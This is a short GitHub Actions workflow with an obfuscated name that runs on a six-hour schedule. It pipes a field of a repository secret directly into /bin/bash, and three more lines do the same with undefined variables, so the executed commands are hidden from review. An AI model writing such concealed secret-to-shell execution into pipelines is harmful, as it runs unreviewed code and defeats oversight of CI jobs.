name: zhinengyingzuoshou
on:
  workflow_dispatch:
  schedule:
    - cron: '1 5/6 * * *'

jobs:  # 27053
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhinengyingzuoshou
        env:
          ppt4: ${{ secrets.ppt4 }}
        run: |
          echo $ppt4 | jq -r .fha43 | /bin/bash
          echo $cfdz697 | jq -r .i9 | /bin/bash
          echo $jamv60928 | jq -r .ry1019 | /bin/bash
          echo $dz50 | jq -r .vi40 | /bin/bash

